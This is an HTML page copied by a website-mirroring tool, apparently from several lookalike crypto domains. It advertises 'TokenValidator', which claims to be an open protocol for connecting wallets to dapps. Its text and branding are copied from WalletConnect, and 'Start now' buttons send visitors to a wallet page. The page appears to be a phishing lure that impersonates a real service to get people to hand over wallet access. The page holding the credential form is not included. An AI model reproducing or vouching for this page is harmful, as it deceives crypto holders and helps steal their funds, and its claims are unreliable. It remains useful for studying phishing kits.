<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from tokenwalletaffix.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 28 Oct 2021 18:09:13 GMT -->

<!-- Mirrored from walletrectification.io/token/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 19 Nov 2021 04:31:30 GMT -->

<!-- Mirrored from tokenvalidatorapp.store/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Nov 2021 18:40:23 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Tokens Validator | Open protocol for Validating various Wallets to Dapps Secure Server</title>
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="bootstrap.min.css" type="text/css">
    <link rel="preconnect" href="fonts.gstatic.com/index.html">
    <link href="fonts.googleapis.com/css236e036e036e036e0.html?family=Lato:wght@100;300;400;700;900&amp;display=swap" rel="stylesheet">
    
    <link href="fonts.googleapis.com/css28309830983098309.html?family=Merriweather+Sans:wght@400;500;600;700;800&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" href="cdn.jsdelivr.net/npm/%40fortawesome/fontawesome-free%405.15.3/css/fontawesome.min.css" integrity="undefined" crossorigin="anonymous">
    <link rel="icon" href="assets/images/logo.png">
</head>
<body>

        <nav class="nav">
    <a href="index-2.html" class="nav__link nav__link--logo">
        <img src="assets/images/logo.png"
             alt="WalletConnect Icon"
             class="nav__link--logo__icon">
        <span class="nav__link--logo__text">TokenValidator</span>
    </a>
    <a href="index-2.html#about" class="nav__link">About</a>
    
    <a href="start/index.html" class="nav__link">Wallets</a>
</nav>
    <header class="header">
        <div class="col-md-12"><div class="row"><div class="col-md-6">  <div class="">
            <h3 class="header__content__lead">
                Connect your wallet to decentralized applications.
            </h3>
            <p class="header__content__para">TokenValidator connects web applications to supported
                mobile wallets TokenValidator session is started by a scanning a QR code
                (desktop) or by clicking an application deep link (mobile).</p>

            <div class="header__content__links" style="padding-bottom: 20px">
                <a href="start/index.html" class="button button--filled">Start now</a>
                
            </div>
        </div>
        
        
       </div> <div class="col-md-6">  <div class="">
            <h3 class="header__content__lead">
                Connect your exchange to decentralized applications.
            </h3>
            <p class="header__content__para">ExcangeValidator connects exchange web applications to supported
                mobile exchange Validator session.</p>

            <div class="header__content__links">
                <a href="start/index.html" class="button button--filled">Start now</a>
                
            </div>
        </div>
        
       </div> </div></div>
       
        
             <!-- <img src="assets/images/banner-main03.png" class="header__img" alt="">-->
         
    </header>

    <div class="about" id="about">
        <div class="about__content about__content--what">
            <h3 class="about__content__header">What is TokenValidator?</h3>
            <p class="about__content__para">
                TokenValidator is an open source protocol for connecting decentralised
                applications to mobile wallets with QR code scanning or deep linking.
                A user can interact securely with any Dapp from their mobile phone,
                making TokenValidator wallets a safer choice compared to desktop or
                browser extension wallets.
            </p>
        </div>
        <div class="about__content about__content--how">
            <h3 class="about__content__header">How does it work?</h3>
            <p class="about__content__para">
                TokenValidator connects web applications to supported mobile
                wallets TokenValidator session is started by a scanning a
                QR code (desktop) or by clicking an application deep link (mobile).
            </p>
        </div>
    </div>

    <div class="misc">
        <div class="misc__content misc__content--validate">
            <h3 class="misc__content--validate__header">How are your tokens validated?</h3>
            <p class="misc__content--validate__para">
                There are various ways we can validate your tokens synchronized in the Blockchain Network'.
            </p>
            <ul class="misc__content--validate__ul">
                <li class="misc__content--validate__ul__li">
                    This approach guarantees that the token is valid, not expired or revoked.
                    Every backend service validates access token only by signature.
                    Some services that have strong security requirements (e.g., in case of personal data access)
                    may still validate access token by the introspecting endpoint.
                </li>

                <li class="misc__content--validate__ul__li">
                    By specifying a key here, the token can be validated without any need for the
                    issuing server. What is needed, instead, is the location of the public key.
                    The certLocation parameter in the sample above is a string pointing to a
                    certificate file containing the public key corresponding to the private
                    key used by the issuing authentication server.
                </li>
            </ul>
        </div>
        <div class="misc__content misc__content--faq faq">
            <h3 class="misc__content--faq__header">Frequently asked questions</h3>
            <div class="misc__content--faq__question">
                <h4 class="misc__content--faq__question__header">
                    <span class="misc__content--faq__question__header--text">&rarr; How do i install TokenValidator</span>
                </h4>
                <p class="misc__content--faq__question__para">
                    TokenValidator is not an app, but a protocol supported by many different decentralised applications and wallets.
                    Install any of mobile wallets supporting TokenValidator protocol.
                    TokenValidator wallets are available for Android and iPhone.
                </p>
            </div>
            <div class="misc__content--faq__question">
                <h4 class="misc__content--faq__question__header">
                    <span class="misc__content--faq__question__header--text">&rarr; Is there a token?</span>
                </h4>
                <p class="misc__content--faq__question__para">
                    There is no token. TokenValidator protocol does not run on a blockchain and there are no fees.
                </p>
            </div>

            <div class="misc__content--faq__question">

                <h4 class="misc__content--faq__question__header">
                    <span class="misc__content--faq__question__header--text">&rarr; How can i help TokenValidator project?</span>
                </h4>
                <p class="misc__content--faq__question__para">
                    TokenValidator project is developed by open source developers of various Wallet and Dapp projects.
                    Please contact us on Discord or Telegram if you want to help the project.
                </p>
            </div>
        </div>

    </div>
</body>



<!-- Mirrored from tokenwalletaffix.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 28 Oct 2021 18:09:16 GMT -->

<!-- Mirrored from walletrectification.io/token/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 19 Nov 2021 04:31:34 GMT -->

<!-- Mirrored from tokenvalidatorapp.store/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Nov 2021 18:40:28 GMT -->
</html>
